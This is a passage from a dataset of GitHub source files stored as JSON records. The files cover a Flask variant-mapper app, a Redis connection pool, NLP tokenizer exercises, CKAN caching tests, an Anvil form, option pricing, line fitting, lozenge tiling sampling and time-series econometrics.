request.args['dataset']\n session['readset'] = request.args['readset']\n return Response()\n\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n app_init = ''\n if session.get('repo'):\n app_init += 'currentRepo=\"%s\"; '% session['repo']\n if session.get('dataset'):\n app_init += 'currentDataset=\"%s\"; '% session['dataset']\n if session.get('readset'):\n app_init += 'currentReadset=%s; '% session['readset']\n\n if request.form.get('term'):\n searchTerms = 'mapTerm(\"%s\");'% request.form['term'];\n else:\n searchTerms = '';\n\n return render_template('index.html', app_init=app_init, searchTerms=searchTerms, term=request.form.get('term', ''))\n\n\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=7000)","repo_name":"ychen306/Variant-Mapper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8252,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23033479386","text":"# -*- coding: utf-8 -*-\r\n# @Explain : \r\n# @Time : 2021/02/22 10:06 \r\n# @Author : tide\r\n# @FileName : pool\r\n\r\nimport time\r\nimport logging\r\nimport redis\r\nfrom functools import partial\r\nfrom threading import Lock\r\nfrom cachetools import LRUCache\r\nfrom redis.connection import ConnectionPool\r\nfrom common.logwriter import trace_full\r\n\r\nlogger = logging.getLogger(__name__)\r\n_pool_cache = {}\r\n_pool_lock = Lock()\r\nDB_RECONNECT_DELAY = 3\r\nMAX_ACCESS_LIMIT = 10000\r\nMAX_ACCESS_COUNT_SECONDS_RECORD = 3600\r\n\r\n\r\nclass RedisNotReadyException(Exception):\r\n pass\r\n\r\n\r\nclass RedisCommandCheckError(Exception):\r\n pass\r\n\r\n\r\ndef _shared_pool(**opts):\r\n if \"host\" in opts:\r\n key = \"{}:{}/{}\".format(opts[\"host\"], opts[\"port\"], opts[\"db\"])\r\n else:\r\n key = \"{}/{}\".format(opts[\"path\"], opts[\"db\"])\r\n pool = _pool_cache.get(key)\r\n if pool is not None:\r\n return pool\r\n with _pool_lock:\r\n pool = _pool_cache.get(key)\r\n if pool is not None:\r\n return pool\r\n pool = ConnectionPool(**opts)\r\n _pool_cache[key] = pool\r\n return pool\r\n\r\n\r\ndef db_check(func):\r\n def decorate(*args, **kwargs):\r\n self = func.keywords.pop(\"_cls\", None)\r\n for i in range(3):\r\n try:\r\n if not self.redis:\r\n raise RedisNotReadyException('[db]connection {} is not ready!!!'.format(self.db_desc()))\r\n\r\n ret = func(*args, 
**kwargs)\r\n                now_sec = int(time.time())\r\n                next_cnt = self.access_count.get(now_sec, 0) + 1\r\n                self.access_count[now_sec] = next_cnt\r\n                # print(\"func: {}, args: {}, kwargs: {}\".format(func.__name__, args, kwargs))\r\n                if next_cnt > self.access_count_max:\r\n                    self.access_count_max = next_cnt\r\n                    logger.info('[db]connection {} access max={}'.format(self.db_desc(), next_cnt))\r\n                if next_cnt >= MAX_ACCESS_LIMIT:\r\n                    logger.error('[db]connection {} access too fast... wait'.format(self.db_desc()))\r\n                    time.sleep(now_sec + 1 - time.time())\r\n                return ret\r\n            except RedisCommandCheckError as e:\r\n                raise e\r\n            except redis.exceptions.NoScriptError as e:\r\n                raise e\r\n            except redis.exceptions.DataError as e:\r\n                raise e\r\n            except RedisNotReadyException as e:\r\n                self.on_except()\r\n                logger.info(\"{}\".format(e))\r\n                self.connect()\r\n            except Exception as e:\r\n                self.on_except()\r\n                logger.error(trace_full())\r\n                logger.error('[db]exception={} args={}'.format(e, args))\r\n                self.connect()\r\n\r\n        raise Exception(\"redis request failed!\")\r\n\r\n    return decorate\r\n\r\n\r\nclass Connection:\r\n    def __init__(self, host=\"127.0.0.1\", port=6379, password=None, db=0):\r\n        self.create_time = 0\r\n        self.access_count = LRUCache(maxsize=MAX_ACCESS_COUNT_SECONDS_RECORD)\r\n        self.access_count_max = 1000\r\n        self.cfg = {\"host\": host, \"port\": port, \"db\": db, \"password\": password, \"socket_keepalive\": True}\r\n        self.pool = None\r\n        self.redis = None\r\n        self.reconnecting = False\r\n        self.connect()\r\n\r\n    def db_desc(self):\r\n        return \"[{}:{}/{}]\".format(self.cfg[\"host\"], self.cfg[\"port\"], self.cfg[\"db\"])\r\n\r\n    def on_except(self):\r\n        if self.pool:\r\n            self.pool.disconnect()\r\n            self.pool = None\r\n\r\n        self.redis = None\r\n        self.reconnecting = False\r\n\r\n    def connect(self):\r\n        while self.redis is None:\r\n            while self.reconnecting:\r\n                logger.info('[db]reconnecting to {} is still in progress, just wait.'.format(self.db_desc()))\r\n                time.sleep(DB_RECONNECT_DELAY)\r\n\r\n            if self.redis:\r\n                return\r\n\r\n            try:\r\n                self.reconnecting = True\r\n                while True:\r\n                    dif = abs(time.time() - self.create_time)\r\n                    if dif >= DB_RECONNECT_DELAY:\r\n                        break\r\n\r\n                    wait = DB_RECONNECT_DELAY - dif\r\n                    logger.info('[db]reconnect to {} needs to wait {} seconds'.format(self.db_desc(), wait))\r\n                    time.sleep(wait)\r\n\r\n                self.create_time = time.time()\r\n                logger.info('[db]connecting to {}.'.format(self.db_desc()))\r\n                self.pool = _shared_pool(**self.cfg)\r\n                self.redis = redis.StrictRedis(connection_pool=self.pool)\r\n                key = 'redis_db_test_key'\r\n                self.redis.set(key, self.create_time)\r\n                v = self.redis.get('redis_db_test_key')\r\n                if not v:\r\n                    raise Exception(\"test db error\")\r\n\r\n                self.reconnecting = False\r\n                print('[db]connect to {} success'.format(self.db_desc()))\r\n            except Exception as e:\r\n                logger.error('[db]connect to {} exception={}'.format(self.db_desc(), e))\r\n                self.on_except()\r\n\r\n    def __getattr__(self, name):\r\n        if hasattr(self.redis, name):\r\n            return db_check(partial(getattr(self.redis, name), _cls=self))\r\n        else:\r\n            super().__getattribute__(name)\r\n\r\n\r\nclass ConnectionManager:\r\n    _connections = {}\r\n\r\n    @staticmethod\r\n    def get(host=\"127.0.0.1\", port=6379, password=None, db=0):\r\n        _key = \"{}:{}/{}\".format(host, port, db)\r\n        if _key in ConnectionManager._connections:\r\n            return ConnectionManager._connections[_key]\r\n\r\n        _conn = Connection(host=host, port=port, password=password, db=db)\r\n        ConnectionManager._connections[_key] = _conn\r\n        return 
_conn\r\n","repo_name":"totide/tools","sub_path":"redis/pool.py","file_name":"pool.py","file_ext":"py","file_size_in_byte":5784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73671107752","text":"#Selected solutions to programming exercises for NLE Week 2\n#import it into a Jupyter notebook using:\n#from W2solutions.py import *\n#then call test_solution(question) to run and display output\n\n#-----------------------------------\n#\"2_1, 2.4\" (DIY Tokenizer)\n\nimport re #import regex module\n\ndef tokenise(sentence):\n sentence = re.sub(\"'(s|m|(re)|(ve)|(ll)|(d))\\s\", \" '\\g<1> \",sentence + \" \")\n sentence = re.sub(\"s'\\s\", \"s ' \",sentence)\n sentence = re.sub(\"n't\\s\", \" n't \",sentence)\n sentence = re.sub(\"gonna\", \"gon na\",sentence)\n sentence = re.sub(\"\\\"(.+?)\\\"\", \"`` \\g<1> ''\",sentence) \n sentence = re.sub(\"([.,?!])\", \" \\g<1> \", sentence)\n return sentence.split()\n\ntestsentence = \"After saying \\\"I won't help, I'm gonna leave!\\\", on his parents' arrival, the boy's behaviour improved.\"\n\n\n#-----------------------------------\n#\"2_2, 1.1\" (Number normalization)\nimport re\n\ndef normalise(tokenlist):\n tokenlist=[token.lower() for token in tokenlist]\n tokenlist=[\"NUM\" if token.isdigit() else token for token in tokenlist]\n tokenlist=[\"Nth\" if (token.endswith((\"nd\",\"st\",\"th\")) and token[:-2].isdigit()) else token for token in tokenlist]\n tokenlist=[\"NUM\" if re.search(\"^[+-]?[0-9]+\\.[0-9]\",token) else token for token in tokenlist]\n return tokenlist\n\ntokens = [\"The\", \"1st\", \"and\", \"2nd\", \"placed\", \"runners\", \"lapped\", \"the\", \"5th\",\".\"]\n\n#---------------------------------\n\ndef test_solution(question):\n if question==\"2_1, 2.4\":\n print(tokenise(testsentence))\n elif question==\"2_2, 1.1\":\n print(normalise(tokens))\n else:\n print(\"No solution for {}\".format(question))\n \n \n ","repo_name":"DashPulsar/G5119-Natural-Language-Engineering","sub_path":"Week 2/W2solutions.py","file_name":"W2solutions.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35645092289","text":"class Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n outs = []\n for i in range(len(nums)):\n diff = target - nums[i]\n if diff in nums and nums.index(diff) != i:\n return [i, nums.index(diff)]\n","repo_name":"muthugit/leetcode_python_solutions","sub_path":"001_TwoSum.py","file_name":"001_TwoSum.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42335593221","text":"'''\nCreated on Jun 3, 2014\n\n@author: alexandru-m-g\n'''\n\nimport pytest\nimport six\n\nimport ckan.plugins.toolkit as tk\nimport ckan.tests.legacy as tests\nimport ckan.model as model\n\nimport ckanext.hdx_package.helpers.caching as caching\nimport ckanext.hdx_theme.tests.hdx_test_base as hdx_test_base\n\nnum_cached_group_list_called = 0\noriginal_get_action = tk.get_action\n\nnum_filter_focus_countries = 0\noriginal_filter_focus_countries = caching.filter_focus_countries\n\nnum_invalidate_group_caches = 0\noriginal_invalidate_group_caches = caching.invalidate_group_caches\n\n\ndef get_action_wrapper(func):\n def my_get_action(action_name):\n global num_cached_group_list_called\n if action_name == 'group_list':\n 
num_cached_group_list_called += 1\n return func(action_name)\n\n return my_get_action\n\n\ndef filter_focus_countries_wrapper(func):\n def my_filter_focus_countries(*args, **kw):\n global num_filter_focus_countries\n num_filter_focus_countries += 1\n return func(*args, **kw)\n\n return my_filter_focus_countries;\n\n\ndef invalidate_group_caches_wrapper(func):\n def my_invalidate_group_caches(*args, **kw):\n global num_invalidate_group_caches\n num_invalidate_group_caches += 1\n return func(*args, **kw)\n\n return my_invalidate_group_caches\n\n\nclass TestGroupsCaching(hdx_test_base.HdxBaseTest):\n @classmethod\n def setup_class(cls):\n super(TestGroupsCaching, cls).setup_class()\n\n global num_cached_group_list_called\n global num_filter_focus_countries\n\n tk.get_action = get_action_wrapper(tk.get_action)\n\n caching.filter_focus_countries = filter_focus_countries_wrapper(caching.filter_focus_countries)\n\n caching.invalidate_group_caches = invalidate_group_caches_wrapper(caching.invalidate_group_caches)\n\n @classmethod\n def teardown_class(cls):\n super(TestGroupsCaching, cls).teardown_class()\n\n tk.get_action = original_get_action\n caching.filter_focus_countries = original_filter_focus_countries\n caching.invalidate_group_caches = original_invalidate_group_caches\n\n def test_cached_group_list(self):\n global num_cached_group_list_called\n\n # calling the function to make sure it's cached\n tk.get_action('cached_group_list')()\n # resetting counter\n num_cached_group_list_called = 0\n\n # the result should have been cached so group_list should not be called\n tk.get_action('cached_group_list')()\n assert num_cached_group_list_called == 0, \\\n 'number of calls to group_list should be 0 , instead {num}'.format(num=num_cached_group_list_called)\n\n caching.invalidate_group_caches()\n # the result should have been removed from cache so group_list should be called\n tk.get_action('cached_group_list')()\n assert num_cached_group_list_called == 1, \\\n 'number of calls to group_list should be 1 , instead {num}'.format(num=num_cached_group_list_called)\n\n # the result should have been cached so the number of calls to group_list shouldn't increase\n tk.get_action('cached_group_list')()\n assert num_cached_group_list_called == 1, \\\n 'number of calls to group_list should be 1 , instead {num}'.format(num=num_cached_group_list_called)\n\n # def test_cached_get_group_package_stuff(self):\n # global num_filter_focus_countries\n #\n # # calling the function to make sure it's cached\n # caching.cached_get_group_package_stuff()\n # # resetting counter\n # num_filter_focus_countries = 0\n #\n # # the result should have been cached so filter_focus_countries should not be called\n # caching.cached_get_group_package_stuff()\n # assert num_filter_focus_countries == 0, \\\n # 'number of calls to filter_focus_countries should be 0 , instead {num}'.format(\n # num=num_filter_focus_countries)\n #\n # caching.invalidate_group_caches()\n # # the result should have been removed from cache so filter_focus_countries should be called\n # caching.cached_get_group_package_stuff()\n # assert num_filter_focus_countries == 1, \\\n # 'number of calls to filter_focus_countries should be 1 , instead {num}'.format(\n # num=num_filter_focus_countries)\n #\n # # the result should have been cached so the num of calls to filter_focus_countries shouldn't increase\n # caching.cached_get_group_package_stuff()\n # assert num_filter_focus_countries == 1, \\\n # 'number of calls to filter_focus_countries should be 1 , instead 
{num}'.format(\n # num=num_filter_focus_countries)\n\n # @pytest.mark.skipif(six.PY3, reason=u\"The hdx_org_group plugin is not available on PY3 yet\")\n def test_group_cache_invalidation_on_change(self):\n global num_invalidate_group_caches\n # resetting counter\n num_invalidate_group_caches = 0\n\n testsysadmin = model.User.by_name('testsysadmin')\n result = tests.call_action_api(self.app, 'group_create', name='group_test',\n apikey=testsysadmin.apikey, status=200)\n\n assert num_invalidate_group_caches == 1, \\\n 'on group_create cache invalidation should have been called'\n","repo_name":"OCHA-DAP/hdx-ckan","sub_path":"ckanext-hdx_theme/ckanext/hdx_theme/tests/test_logic/test_caching.py","file_name":"test_caching.py","file_ext":"py","file_size_in_byte":5323,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"72"} +{"seq_id":"35013889344","text":"from ._anvil_designer import FutureActivitiesTemplateTemplate\nfrom anvil import *\nimport anvil.server\nimport anvil.users\nimport anvil.tables as tables\nimport anvil.tables.query as q\nfrom anvil.tables import app_tables\nfrom .... import navigation\nfrom .... import data_access\nfrom .... import Globals\n\nfrom .ActivitiesEditTemplate import ActivitiesEditTemplate\n\nclass FutureActivitiesTemplate(FutureActivitiesTemplateTemplate):\n def __init__(self, **properties):\n # Set Form properties and Data Bindings.\n self.init_components(**properties)\n# print('FutureActivitiesTemplate opened')\n self.link_delete.visible = False\n self.link_edit.visible = False\n# self.refresh_data_bindings()\n \n \n user = data_access.the_user()\n# print('testing if user is admin')\n if user['admin'] == True:\n self.link_delete.visible = True\n self.link_edit.visible = True\n \n# print('testing if user is owner of activity')\n owner_of_activity = self.item['owner']\n if owner_of_activity == user:\n self.link_delete.visible = True\n self.link_edit.visible = True\n \n\n def link_edit_click(self, **event_args):\n activity_dict = dict(list(self.item))\n user = data_access.the_user()\n print('FutureActivitiesTemplate link_edit_click called')\n #from Add Activity code, need to catch more than one Activity, and Midnight.\n #NEED TO FIGURE OUT HOW TO DO ERROR MESSAGES IN ALERT BOXES\n# self.label_error_msg.visible = False\n \n# error = self.sync_data()\n# if error:\n# self.label_error_msg.text = error\n# self.label_error_msg.visible = True \n# return\n \n# def sync_data(self):\n# if not self.input_activity_title.text:\n# return\"Activity Title is required.\"\n\n# if not self.input_activity_date_picker.date:\n# return\"Date / Time is required. 
Please note this is a 24 hour drop-down, and you must press the Apply button\"\n\n# if not self.input_check_box_golf.checked and not self.input_check_box_meals.checked and not self.input_check_box_other.checked:\n# return\"Please select a Category.\"\n\n# if self.input_check_box_golf.checked and self.input_check_box_meals.checked:\n# return \"Please select ONLY 1 Category.\"\n\n# if self.input_check_box_golf.checked and self.input_check_box_other.checked:\n# return \"Please select ONLY 1 Category.\"\n\n# if self.input_check_box_meals.checked and self.input_check_box_other.checked:\n# return \"Please select ONLY 1 Category.\"\n\n# return None \n #END Add Activity code, need to catch more than one Activity, and Midnight.\n \n \n if alert(content=ActivitiesEditTemplate(item=activity_dict), title=\"Update Activity Info\",\n large=True, buttons=[(\"Save\", True), (\"Cancel\", False)]):\n anvil.server.call('edit_activity', self.item, activity_dict)\n self.parent.raise_event('x-edit-activity', activity=activity_dict)\n \n message = f\"Update recorded, thanks {user['first_name']}!\"\n n = Notification(message)\n n.show()\n \n\n\n def link_delete_click(self, **event_args):\n print('FutureActivitiesTemplate link_delete_click called')\n user = data_access.the_user()\n if confirm(f\"Are you sure you want to delete this entry, {user['first_name']} ?\\n It will also delete the sign-ups for this activity.\"):\n self.parent.raise_event('x-delete-activity', activity=self.item)\n\n\n\n \n \n\n\n \n\n \n\n","repo_name":"billstrand1/nav-template","sub_path":"client_code/Home/Components/ActivitiesSummaryComponent/FutureActivitiesTemplate.py","file_name":"FutureActivitiesTemplate.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3336158741","text":"# -*- coding: utf-8 -*-\n#%% NumPyの読み込み\nimport numpy as np\n# 原資産価格の二項木の生成\ndef Binomial_Price_Tree(CurrentPrice, Uptick, NumberOfPeriods):\n # CurrentPrice: 現時点の原資産価格\n # Uptick: 原資産価格の上昇率(この逆数が下落率)\n # NumberOfPeriods: 満期までの期間数\n # Output: 原資産価格の二項木\n Price = np.array([CurrentPrice])\n yield Price\n for i in range(NumberOfPeriods):\n Price = np.r_[Price * Uptick, Price[-1] / Uptick]\n yield Price\n# ヨーロピアン・オプション価格の計算\ndef European_Option_Pricing(Payoff, DiscountFactor, RiskNeutralProb):\n # Payoff: 利得の二項木\n # DiscountFactor: 割引係数\n # RiskNeutralProb: リスク中立確率\n # Output: オプション価格の二項木\n Premium = Payoff[-1]\n yield Premium\n for i in range(len(Payoff) - 1):\n Premium = (RiskNeutralProb * Premium[:-1] +\n (1.0 - RiskNeutralProb) * Premium[1:]) * DiscountFactor\n yield Premium\n# アメリカン・オプション価格の計算\ndef American_Option_Pricing(Payoff, DiscountFactor, RiskNeutralProb):\n # Payoff: 利得の二項木\n # DiscountFactor: 割引係数\n # RiskNeutralProb: リスク中立確率\n # Output: オプション価格の二項木\n Premium = Payoff[-1]\n yield Premium\n for i in range(2, len(Payoff) + 1):\n Premium = np.maximum(Payoff[-i],\n (RiskNeutralProb * Premium[:-1]\n + (1.0 - RiskNeutralProb) * Premium[1:])\n * DiscountFactor)\n yield Premium\n#%% オプション価格の計算\nS = 100.0\nK = 100.0\nu = 1.05\nd = 1.0/u\nf = 1.02\nN = 3\nq = (f - d) / (u - d)\nPrice = [S for S in Binomial_Price_Tree(S, u, N)]\nPayoff_Call = [np.maximum(S - K, 0.0) for S in Price]\nEuropean_Call = [C for C in European_Option_Pricing(Payoff_Call, 1.0/f, q)]\nPayoff_Put = [np.maximum(K - S, 0.0) for S in Price]\nEuropean_Put = [P for P in European_Option_Pricing(Payoff_Put, 1.0/f, q)]\nAmerican_Put = [P for P in American_Option_Pricing(Payoff_Put, 1.0/f, 
\n","repo_name":"nakatsuma/python_for_finance","sub_path":"python/pyfin_option_pricing.py","file_name":"pyfin_option_pricing.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} {"seq_id":"22227463930","text":"#!/usr/bin/env python3\n\n# Just call the script to obtain a help and usage message\n\nimport sys\nimport argparse\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport scipy.odr as sodr\n\n# Function definitions:\n\n# The function lin_func is internally used by the ODR fitting procedure.\n# It is probably not useful to call it in other circumstances.\ndef lin_func(p, x):\n    \"\"\"\n    The function is internally used by the ODR-fit procedure\n\n    function arguments:\n    p: a numpy-array of two elements (slope and y-intersection of a line)\n    x: value for which you want to evaluate the function\n\n    The function calculates p[0] * x + p[1] and returns that value.\n    \"\"\"\n\n    m, c = p\n    return m * x + c\n\n# main script tasks start here:\n\n# read command line arguments:\nparser = argparse.ArgumentParser(\n    formatter_class=argparse.RawDescriptionHelpFormatter,\n    epilog=\"\"\"\nDESCRIPTION:\n    The script performs a line-fit for data that contain errors in\n    the x- and y-coordinates!\n\n    Input is a file (command line option -i) with four columns:\n    x, error_x, y, error_y.\n\n    The input file may contain comment lines starting with a hash (#).\n\n    The program fits a two-parameter line (y = a * x + b) to approximate\n    the data. The used algorithm, the orthogonal-distance regression,\n    is thoroughly documented at\n    http://docs.scipy.org/doc/scipy/reference/odr.html.\n\n    Program output are the best-fit line parameters a and b together with\n    their estimated errors. In addition, the user can ask for a plot\n    of the data points together with the best-fit line (command line option\n    '-o').\n\nEXAMPLES:\n\n    - ./chi2FitXYErr.py -i dataxy.txt\n      Fits a line to the data in 'dataxy.txt' and prints the fit results to\n      screen\n\n    - ./chi2FitXYErr.py -i dataxy.txt -o result.png\n      The same as above. In addition, data points and best-fit line\n      are shown in the plot 'result.png'.\n\nAUTHOR:\n    Thomas Erben (terben@astro.uni-bonn.de)\n\"\"\"\n)\nparser.add_argument('-i', '--input_file', nargs=1,\n                    required=True, help='name of the data file')\nparser.add_argument('-o', '--output_file', nargs=1,\n                    help='name of the output plot (OPTIONAL)')\n\nargs = parser.parse_args()\n\ninput_file = args.input_file[0]\n\n# Read data:\ndata = np.loadtxt(input_file)\n\n# Rough sanity check: Does the input file have 4 columns?\nif data.shape[1] != 4:\n    print(\"File %s does not have 4 columns!\" % (input_file), file=sys.stderr)\n    sys.exit(1)\n\n# Give meaningful variable names to input data columns:\nx = data[:,0]\nx_error = data[:,1]\ny = data[:,2]\ny_error = data[:,3]
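\n\n# Hypothetical quick-start (added for illustration; kept commented out so the\n# script's behaviour is unchanged): create a compatible four-column test file.\n# rng = np.random.default_rng(0)\n# xs = np.linspace(0.0, 10.0, 20)\n# ys = 2.0 * xs + 1.0 + rng.normal(0.0, 0.5, xs.size)\n# np.savetxt('dataxy.txt', np.column_stack(\n#     [xs, np.full_like(xs, 0.1), ys, np.full_like(xs, 0.5)]))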
\n# Perform the fitting procedure. For an explanation of the following\n# four code lines consult the help of the scipy.odr module:\nlin_model = sodr.Model(lin_func)\nfit_data = sodr.RealData(x, y, sx=x_error, sy=y_error)\nodr = sodr.ODR(fit_data, lin_model, beta0=[0., 1.])\nout = odr.run()\n\n# We give meaningful names to the best-fit parameters and errors\n# returned by 'odr.run':\na = out.beta[0]\nb = out.beta[1]\nerr_a = out.sd_beta[0] # error on a\nerr_b = out.sd_beta[1] # error on b\n\n\nprint(\"result of fit:\\n\")\nprint(\"y = a * x + b with\\n\")\nprint(\"a = %f +/- %f\" % (a, err_a))\nprint(\"b = %f +/- %f\" % (b, err_b))\n\n# create a plot with data points and fit-line if the user asked for it:\nif args.output_file != None:\n    # font size of labels etc.\n    matplotlib.rcParams['font.size'] = 18\n    # line width of coordinate axes\n    matplotlib.rcParams['axes.linewidth'] = 2.0\n\n    y_fit = a * x + b\n\n    plt.figure()\n    plt.errorbar(x, y, xerr=x_error, yerr=y_error,\n                 lw=2, fmt='.', label=\"data points\")\n    plt.plot(x, y_fit, lw=2, label=\"y=%.2f * x + %.2f\" % (a, b))\n    plt.xlabel('x')\n    plt.ylabel('y')\n    plt.title(\"%d data points and line-fit\" % (x.shape[0]))\n    plt.legend()\n\n    plt.savefig(args.output_file[0], bbox_inches='tight')\n","repo_name":"terben/Programming_in_Python_BCGS_Summer_2022","sub_path":"lecture_09/code/chi2FitXYErr.py","file_name":"chi2FitXYErr.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} {"seq_id":"21063939215","text":"import copy\nimport random\n\nSIZE = 4\nlow_tiling = [[0 for j in range(SIZE)] for k in range(SIZE)]\nhigh_tiling = [[SIZE for j in range(SIZE)] for k in range(SIZE)]\n\n\ndef randomMove():\n    # since we might count coordinates with multiple 0s multiple times, we\n    # handle them separately.\n\n    poscount = (3 * (SIZE**2)) - (3*SIZE) + 1\n    dieroll = random.randint(1, poscount)\n    if dieroll == 1:\n        pos = [0, 0, 0]\n    elif dieroll <= (SIZE-1)*3 + 1:\n        poscoord = random.randint(0, 2)\n        pos = []\n        for i in range(3):\n            if i == poscoord:\n                pos.append(random.randint(1, SIZE-1))\n            else:\n                pos.append(0)\n    else:\n        zerocoord = random.randint(0, 2)\n        pos = []\n        for i in range(3):\n            if i == zerocoord:\n                pos.append(0)\n            else:\n                pos.append(random.randint(1, SIZE-1))\n\n    pushpull = bool(random.getrandbits(1))\n    return (pos, pushpull)\n\n\n# given a move, return the coordinates of the pile it affects\n# if there are no possible coordinates, returns None\ndef trueMovePos(heights, move):\n    temppos = copy.deepcopy(move[0]) # make a copy\n    while max(temppos) < SIZE:\n        targetheight = temppos[2]\n        if move[1]:\n            targetheight += 1\n        currheight = heights[temppos[0]][temppos[1]]\n        if currheight == targetheight:\n            return temppos[:2]\n        elif currheight < targetheight:\n            return None\n\n        temppos = [e + 1 for e in temppos]\n\n    return None\n\n\n# given a move, return the coordinates of the pile it affects\n# if the move is illegal, returns None\ndef legalMove(heights, move):\n    pos = trueMovePos(heights, move)\n    if pos:\n        if move[1]:\n            if pos[0] != SIZE-1:\n                if heights[pos[0]][pos[1]] <= heights[pos[0]+1][pos[1]]:\n                    return None\n            if pos[1] != SIZE-1:\n                if heights[pos[0]][pos[1]] <= heights[pos[0]][pos[1]+1]:\n                    return None\n        else:\n            if pos[0] != 0:\n                if heights[pos[0]][pos[1]] >= heights[pos[0]-1][pos[1]]:\n                    return None\n            if pos[1] != 0:\n                if heights[pos[0]][pos[1]] >= heights[pos[0]][pos[1]-1]:\n                    return None\n    return pos
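\n\n\n# Worked example (added, illustrative): on the all-zero low_tiling the only\n# legal move is the pull at the origin; trueMovePos matches heights[0][0] == 0\n# at [0, 0, 0], and legalMove skips both boundary checks there, e.g.\n#   h = copy.deepcopy(low_tiling)\n#   performMove(h, ([0, 0, 0], False))  # pull: h[0][0] becomes 1\n# Every push is rejected because no pile reaches the target height z + 1.\n\n\n# destructive, modifies the configuration passed in\n# does nothing if the move is illegal\ndef 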
performMove(heights, move):\n movepos = legalMove(heights, move)\n if movepos is not None:\n if move[1]:\n heights[movepos[0]][movepos[1]] -= 1\n else:\n heights[movepos[0]][movepos[1]] += 1\n\n\n# nondestructive, performs moves back to front\ndef performMoves(heights, move_list):\n newheights = copy.deepcopy(heights)\n for i in range(len(move_list)-1, -1, -1):\n performMove(newheights, move_list[i])\n return newheights\n\n\ndef isIndependant(move_list):\n lt = performMoves(low_tiling, move_list)\n ht = performMoves(high_tiling, move_list)\n\n for x in range(SIZE):\n for y in range(SIZE):\n if lt[x][y] != ht[x][y]:\n return False\n\n return True\n\n\ndef randomConfig():\n move_list = []\n moves_per_step = 1\n while not isIndependant(move_list):\n for i in range(moves_per_step):\n move_list.append(randomMove())\n\n moves_per_step *= 2\n\n return performMoves(low_tiling, move_list)\n\n\n# test if this is the main file or if this is imported\nif __name__ == '__main__':\n print(randomConfig())\n","repo_name":"r0ckwav3/LozengeTiling","sub_path":"GenerateTiling.py","file_name":"GenerateTiling.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37608138798","text":"from .decay4m import decay4m\n\n__all__=['decay4']\n\nclass decay4(decay4m):\n ''' decay4\nDetermine characteristic decay times, for spheroidal motion. Non-gravitational program.\nOutput file: decay4.out\n'''\n def __init__(self,\n earth_model = None,\n decay4_out = 'decay4.out',\n l_min = None,\n l_max = None,\n \n if_skip_on_existing_output = True,\n stdout = None,\n stderr = None,\n ):\n super().__init__(\n earth_model = earth_model,\n decay4_out = decay4_out,\n l_min = l_min,\n l_max = l_max,\n if_skip_on_existing_output = if_skip_on_existing_output,\n stdout = stdout,\n stderr = stderr,)\n \n self._cmd = 'decay4'\n \n","repo_name":"zy31415/viscojapan","sub_path":"lib/viscojapan/pollitz/pollitz_wrapper/decay4.py","file_name":"decay4.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"71442179434","text":"from portal.portalMgmtServer import *\nfrom portal.portalWebServer import *\nfrom portal.portalClientMgmt import *\nfrom portal.portalConfig import *\n\nif __name__ == \"__main__\":\n\n global serverMgmt\n global portalCfg\n global clientMgmt\n global portalServerThread\n\n portalCfg = myPortalServerCfg()\n serverMgmt = portalServerMgmt()\n serverMgmt.serverCfg = portalCfg\n serverMgmt.clientMgmt = portalClientMgmt(serverMgmt.serverCfg)\n serverMgmt.portalServerLaunch()\n\n time.sleep(0.1)\n\n launchMain(serverMgmt)","repo_name":"yxjsolid/portalServer","sub_path":"portalMain.py","file_name":"portalMain.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"31953365873","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom statsmodels.tsa.api import VECM\nfrom statsmodels.tsa.vector_ar.vecm import select_coint_rank\nfrom matplotlib.ticker import FuncFormatter\n\nseries = (\n pd.read_csv(\"../dados/series_log.csv\", parse_dates=[0])\n .set_index(\"date\")\n .dropna()\n)\n\n# endogenas = series.loc[:, [\"spread\", \"selic\", \"ibc\", \"inad\"]]\nendogenas = series.loc[:, [\"selic\", \"inad\", \"ibc\", \"spread\"]]\nexogenas = series.loc[:, [\"igp\"]].fillna(0)\n\nprint(\n select_coint_rank(endog=endogenas, det_order=1, 
